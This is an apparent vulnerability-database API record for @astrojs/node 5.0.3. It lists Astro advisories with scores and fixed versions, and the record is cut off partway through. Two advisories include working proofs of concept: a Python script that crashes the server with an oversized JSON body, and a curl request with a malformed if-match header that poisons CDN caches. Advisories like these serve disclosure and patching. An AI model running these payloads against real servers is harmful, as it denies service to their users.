Look up vulnerable packages by Package URL.

GET /api/packages/843101?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/843101?format=api",
    "purl": "pkg:npm/%40astrojs/node@5.0.3",
    "type": "npm",
    "namespace": "@astrojs",
    "name": "node",
    "version": "5.0.3",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": "10.0.5",
    "latest_non_vulnerable_version": "10.0.5",
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91508?format=api",
            "vulnerability_id": "VCID-c6g3-td4y-gbgj",
            "summary": "Astro: Memory exhaustion DoS due to missing request body size limit in Server Islands\n### Summary\n\nAstro's Server Islands POST handler buffers and parses the full request body as JSON without enforcing a size limit. Because `JSON.parse()` allocates a V8 heap object for every element in the input, a crafted payload of many small JSON objects achieves ~15x memory amplification (wire bytes to heap bytes), allowing a single unauthenticated request to exhaust the process heap and crash the server. The `/_server-islands/[name]` route is registered on all Astro SSR apps regardless of whether any component uses `server:defer`, and the body is parsed before the island name is validated, so any Astro SSR app with the Node standalone adapter is affected.\n\n### Details\n\nAstro automatically registers a Server Islands route at `/_server-islands/[name]` on all SSR apps, regardless of whether any component uses `server:defer`. The POST handler in `packages/astro/src/core/server-islands/endpoint.ts` buffers the entire request body into memory and parses it as JSON with no size or depth limit:\n\n```js\n// packages/astro/src/core/server-islands/endpoint.ts (lines 55-56)\nconst raw = await request.text();    // full body buffered into memory — no size limit\nconst data = JSON.parse(raw);        // parsed into V8 object graph — no element count limit\n```\n\nThe request body is parsed before the island name is validated, so the attacker does not need to know any valid island name — `/_server-islands/anything` triggers the vulnerable code path. No authentication is required.\n\nAdditionally, `JSON.parse()` allocates a heap object for every array/object in the input, so a payload consisting of many empty JSON objects (e.g., `[{},{},{},...]`) achieves ~15x memory amplification (wire bytes to heap bytes). The entire object graph is held as a single live reference until parsing completes, preventing garbage collection. An 8.6 MB request is sufficient to crash a server with a 128 MB heap limit.\n\n### PoC\n\n**Environment:** Astro 5.18.0, `@astrojs/node` 9.5.4, Node.js 22 with `--max-old-space-size=128`.\n\nThe app does **not** use `server:defer` — this is a minimal SSR setup with no server island components. The route is still registered and exploitable.\n\n**Setup files:**\n\n`package.json`:\n```json\n{\n  \"name\": \"poc-server-islands-dos\",\n  \"scripts\": {\n    \"build\": \"astro build\",\n    \"start\": \"node --max-old-space-size=128 dist/server/entry.mjs\"\n  },\n  \"dependencies\": {\n    \"astro\": \"5.18.0\",\n    \"@astrojs/node\": \"9.5.4\"\n  }\n}\n```\n\n`astro.config.mjs`:\n```js\nimport { defineConfig } from 'astro/config';\nimport node from '@astrojs/node';\n\nexport default defineConfig({\n  output: 'server',\n  adapter: node({ mode: 'standalone' }),\n});\n```\n\n`src/pages/index.astro`:\n```astro\n---\n---\n<html>\n<head><title>Astro App</title></head>\n<body>\n  <h1>Hello</h1>\n  <p>Just a plain SSR page. No server islands.</p>\n</body>\n</html>\n```\n\n`Dockerfile`:\n```dockerfile\nFROM node:22-slim\nWORKDIR /app\nCOPY package.json .\nRUN npm install\nCOPY . .\nRUN npm run build\nEXPOSE 4321\nCMD [\"node\", \"--max-old-space-size=128\", \"dist/server/entry.mjs\"]\n```\n\n`docker-compose.yml`:\n```yaml\nservices:\n  astro:\n    build: .\n    ports:\n      - \"4321:4321\"\n    deploy:\n      resources:\n        limits:\n          memory: 256m\n```\n\n**Reproduction:**\n\n```bash\n# Build and start\ndocker compose up -d\n\n# Verify server is running\ncurl http://localhost:4321/\n# => 200 OK\n```\n\n`crash.py`:\n```python\nimport requests\n\n# Any path under /_server-islands/ works — no valid island name needed\nTARGET = \"http://localhost:4321/_server-islands/x\"\n\n# 3M empty objects: each {} is ~3 bytes JSON but ~56-80 bytes as V8 object\n# 8.6 MB on wire → ~180+ MB heap allocation → exceeds 128 MB limit\nn = 3_000_000\npayload = '[' + ','.join(['{}'] * n) + ']'\nprint(f\"Payload: {len(payload) / (1024*1024):.1f} MB\")\n\ntry:\n    r = requests.post(TARGET, data=payload,\n        headers={\"Content-Type\": \"application/json\"}, timeout=30)\n    print(f\"Status: {r.status_code}\")\nexcept requests.exceptions.ConnectionError:\n    print(\"Server crashed (OOM killed)\")\n```\n\n```\n$ python crash.py\nPayload: 8.6 MB\nServer crashed (OOM killed)\n\n$ curl http://localhost:4321/\ncurl: (7) Failed to connect to localhost port 4321: Connection refused\n\n$ docker compose ps\nNAME      IMAGE     COMMAND   SERVICE   CREATED   STATUS    PORTS\n(empty — container was OOM killed)\n```\n\nThe server process is killed and does not recover. Repeated requests in a containerized environment with restart policies cause a persistent crash-restart loop.\n\n### Impact\n\nAny Astro SSR app with the Node standalone adapter is affected — the `/_server-islands/[name]` route is registered by default regardless of whether any component uses `server:defer`. Unauthenticated attackers can crash the server process with a single crafted HTTP request under 9 MB. In containerized environments with memory limits, repeated requests cause a persistent crash-restart loop, denying service to all users. The attack requires no authentication and no knowledge of valid island names — any value in the `[name]` parameter works because the body is parsed before the name is validated.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29772",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00026",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07838",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00026",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07823",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00026",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0785",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29772"
                },
                {
                    "reference_url": "https://github.com/withastro/astro",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/withastro/astro"
                },
                {
                    "reference_url": "https://github.com/withastro/astro/commit/f9ee8685dd26e9afeba3b48d41ad6714f624b12f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/withastro/astro/commit/f9ee8685dd26e9afeba3b48d41ad6714f624b12f"
                },
                {
                    "reference_url": "https://github.com/withastro/astro/releases/tag/@astrojs/node@10.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/withastro/astro/releases/tag/@astrojs/node@10.0.0"
                },
                {
                    "reference_url": "https://github.com/withastro/astro/security/advisories/GHSA-3rmj-9m5h-8fpv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:16:28Z/"
                        }
                    ],
                    "url": "https://github.com/withastro/astro/security/advisories/GHSA-3rmj-9m5h-8fpv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29772",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29772"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3rmj-9m5h-8fpv",
                    "reference_id": "GHSA-3rmj-9m5h-8fpv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3rmj-9m5h-8fpv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/113791?format=api",
                    "purl": "pkg:npm/%40astrojs/node@10.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-jt7q-nwep-wbfb"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0"
                }
            ],
            "aliases": [
                "CVE-2026-29772",
                "GHSA-3rmj-9m5h-8fpv"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c6g3-td4y-gbgj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50307?format=api",
            "vulnerability_id": "VCID-ecmk-efnj-nbfq",
            "summary": "Astro has Full-Read SSRF in error rendering via Host: header injection\nServer-Side Rendered pages that return an error with a prerendered custom error page (eg. `404.astro` or `500.astro`) are vulnerable to SSRF. If the `Host:` header is changed to an attacker's server, it will be fetched on `/500.html` and they can redirect this to any internal URL to read the response body through the first request.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25545",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.05142",
                            "scoring_system": "epss",
                            "scoring_elements": "0.90053",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.05142",
                            "scoring_system": "epss",
                            "scoring_elements": "0.9005",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.05142",
                            "scoring_system": "epss",
                            "scoring_elements": "0.90052",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25545"
                },
                {
                    "reference_url": "https://docs.astro.build/en/basics/astro-pages/#custom-500-error-page",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://docs.astro.build/en/basics/astro-pages/#custom-500-error-page"
                },
                {
                    "reference_url": "https://github.com/withastro/astro",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/withastro/astro"
                },
                {
                    "reference_url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:50:52Z/"
                        }
                    ],
                    "url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9"
                },
                {
                    "reference_url": "https://github.com/withastro/astro/releases/tag/%40astrojs%2Fnode%409.5.4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:50:52Z/"
                        }
                    ],
                    "url": "https://github.com/withastro/astro/releases/tag/%40astrojs%2Fnode%409.5.4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25545",
                    "reference_id": "CVE-2026-25545",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25545"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qq67-mvv5-fw3g",
                    "reference_id": "GHSA-qq67-mvv5-fw3g",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qq67-mvv5-fw3g"
                },
                {
                    "reference_url": "https://github.com/withastro/astro/security/advisories/GHSA-qq67-mvv5-fw3g",
                    "reference_id": "GHSA-qq67-mvv5-fw3g",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:50:52Z/"
                        }
                    ],
                    "url": "https://github.com/withastro/astro/security/advisories/GHSA-qq67-mvv5-fw3g"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/74205?format=api",
                    "purl": "pkg:npm/%40astrojs/node@9.5.4",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-c6g3-td4y-gbgj"
                        },
                        {
                            "vulnerability": "VCID-jt7q-nwep-wbfb"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.5.4"
                }
            ],
            "aliases": [
                "CVE-2026-25545",
                "GHSA-qq67-mvv5-fw3g"
            ],
            "risk_score": 3.9,
            "exploitability": "0.5",
            "weighted_severity": "7.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ecmk-efnj-nbfq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89280?format=api",
            "vulnerability_id": "VCID-jt7q-nwep-wbfb",
            "summary": "Astro: Cache Poisoning due to incorrect error handling when if-match header is malformed\n### Summary\nRequesting a static JS/CSS resource from the `_astro` path with an incorrect or malformed `if-match` header returns a `500` error with a one-year cache lifetime instead of `412` in some cases. As a result, all subsequent requests to that file — regardless of the `if-match` header — will be served a 5xx error instead of the file until the cache expires.\n\nSending an incorrect or malformed `if-match` header should always return a `412` error without any cache headers, which is not the current behavior.\n\n### Affected Versions\n- `astro@5.14.1`\n- `@astrojs/node@9.4.4`\n\n### Proof of Concept\n\nRun the following command:\n\n```\ncurl -s -o /dev/null -D - <host location>/_astro/_slug_.UTbyeVfw.css -H \"if-match: xxx\"\n```\n\nIf a 5xx error is not returned, inspect the resources via the browser's web inspector and select another CSS/JS file to request until a 5xx error is returned. The behavior generally defaults to a 5xx response. Note that all static files are immutable, so the cache must be purged or disabled to reproduce reliably.\n\nA response similar to the following is expected from CloudFront:\n\n```\nHTTP/2 500 \ncontent-type: text/html\ncontent-length: 166541\ndate: Thu, 09 Apr 2026 12:53:08 GMT\nlast-modified: Wed, 21 Jan 2026 13:40:08 GMT\netag: \"a68349e96c2faf8861c330aeb548441a\"\nx-amz-server-side-encryption: AES256\naccept-ranges: bytes\nserver: AmazonS3\nx-cache: Error from cloudfront\nvia: 1.1 3591be88662e5675a9dc1cc4e0a9c392.cloudfront.net (CloudFront)\nx-amz-cf-pop: ZRH55-P2\nx-amz-cf-id: Rg--RIYCKcA55GZqZXdvu-VTvpxBFFVzV4LBIcKq5pB_hktcrhYbKg==\n```\n\nThe above is not the real server output but the AWS error response triggered when the pods return a 5xx. Below is the output of the same `curl` command issued directly against a pod in Kubernetes:\n\n```\n❯ curl -s -o /dev/null -D - -H \"Host: tagesanzeiger.ch\" 127.0.0.1:3333/_astro/InstallPrompt.astro_astro_type_script_index_0_lang.C0M4llHG.js -H \"if-match: xxx\"\n\nHTTP/1.1 500 Internal Server Error\nCache-Control: public, max-age=31536000, immutable\nAccept-Ranges: bytes\nLast-Modified: Tue, 07 Apr 2026 07:08:03 GMT\nETag: W/\"560-19d66c50c38\"\nContent-Type: text/javascript; charset=utf-8\nDate: Tue, 07 Apr 2026 08:23:54 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\nTransfer-Encoding: chunked\n```\n\nThis demonstrates that the pod itself returns a `5xx` error instead of `412`. In addition, the response includes a `Cache-Control: public, max-age=31536000, immutable` header.\n\nBecause the testing setup configures `if-match` as part of the cache key, the exploit no longer affects the production application. Prior to that change, the CDN Point of Presence would become cache-poisoned, and any client visiting the affected pages without cached files through the same PoP would receive broken pages. This was reproduced by creating test URLs and visiting them in a browser only after triggering the exploit. The exploited resources returned `5xx` errors instead of the original CSS/JS content, breaking the application.\n\n### Details\nThe findings were analyzed with an LLM, which identified the following file as the likely source: [serve-static.ts](https://github.com/withastro/astro/blob/main/packages/integrations/node/src/serve-static.ts)\n\n```js\n// Lines 129-153\n\nlet forwardError = false;\n\nstream.on('error', (err) => {\n    if (forwardError) {\n        console.error(err.toString());\n        res.writeHead(500);\n        res.end('Internal server error');\n        return;\n    }\n    // File not found, forward to the SSR handler\n    ssr();\n});\nstream.on('headers', (_res: ServerResponse) => {\n    // assets in dist/_astro are hashed and should get the immutable header\n    if (normalizedPathname.startsWith(`/${app.manifest.assetsDir}/`)) {\n        // This is the \"far future\" cache header, used for static files whose name includes their digest hash.\n        // 1 year (31,536,000 seconds) is convention.\n        // Taken from https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control#immutable\n        _res.setHeader('Cache-Control', 'public, max-age=31536000, immutable');\n    }\n});\nstream.on('file', () => {\n    forwardError = true;\n});\nstream.pipe(res);\n```\n\nLLM analysis:\n\n> `send` handles conditional request headers such as `If-Match` internally. When a file is found but the precondition fails (ETag mismatch), `send`:\n>\n> 1. Emits `file` (the file exists) → `forwardError = true`\n> 2. Emits `headers` → `Cache-Control: public, max-age=31536000, immutable` is set on `res`\n> 3. Emits `error` with a `PreconditionFailedError` (status 412)\n>\n> However, the error handler does not inspect the error's status code:\n>\n> ```js\n> stream.on('error', (err) => {\n>     if (forwardError) {\n>         console.error(err.toString());\n>         res.writeHead(500);   // ← always 500, regardless of the actual error\n>         res.end('Internal server error');\n>         return;\n>     }\n>     ssr();\n> });\n> ```\n>\n> Because `Cache-Control` was already set during the `headers` event, the response is sent as:\n>\n> ```\n> HTTP/1.1 500 Internal Server Error\n> Cache-Control: public, max-age=31536000, immutable\n> ```\n\n\n### Impact\n**Cache Poisoning** — An attacker can force edge servers to cache an error page instead of the actual content, rendering one or more assets unavailable to legitimate users until the cache expires.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41322",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17722",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17756",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17763",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41322"
                },
                {
                    "reference_url": "https://github.com/withastro/astro",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/withastro/astro"
                },
                {
                    "reference_url": "https://github.com/withastro/astro/security/advisories/GHSA-c57f-mm3j-27q9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:48:09Z/"
                        }
                    ],
                    "url": "https://github.com/withastro/astro/security/advisories/GHSA-c57f-mm3j-27q9"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41322",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41322"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c57f-mm3j-27q9",
                    "reference_id": "GHSA-c57f-mm3j-27q9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-c57f-mm3j-27q9"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110333?format=api",
                    "purl": "pkg:npm/%40astrojs/node@10.0.5",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.5"
                }
            ],
            "aliases": [
                "CVE-2026-41322",
                "GHSA-c57f-mm3j-27q9"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jt7q-nwep-wbfb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57869?format=api",
            "vulnerability_id": "VCID-mhk4-vf4t-47g7",
            "summary": "@astrojs/node's trailing slash handling causes open redirect issue\nFollowing https://github.com/withastro/astro/security/advisories/GHSA-cq8c-xv66-36gw, there's still an Open Redirect vulnerability in a subset of Astro deployment scenarios.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55207",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1321",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13174",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13213",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55207"
                },
                {
                    "reference_url": "https://github.com/withastro/astro",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/withastro/astro"
                },
                {
                    "reference_url": "https://github.com/withastro/astro/commit/5fc3c599cacb0172cc7d8e1202a5f2e8685d7ef2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-15T19:10:24Z/"
                        }
                    ],
                    "url": "https://github.com/withastro/astro/commit/5fc3c599cacb0172cc7d8e1202a5f2e8685d7ef2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55207",
                    "reference_id": "CVE-2025-55207",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55207"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9x9c-ghc5-jhw9",
                    "reference_id": "GHSA-9x9c-ghc5-jhw9",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-9x9c-ghc5-jhw9"
                },
                {
                    "reference_url": "https://github.com/withastro/astro/security/advisories/GHSA-9x9c-ghc5-jhw9",
                    "reference_id": "GHSA-9x9c-ghc5-jhw9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-15T19:10:24Z/"
                        }
                    ],
                    "url": "https://github.com/withastro/astro/security/advisories/GHSA-9x9c-ghc5-jhw9"
                }
            ],
            "fixed_packages": [
                {
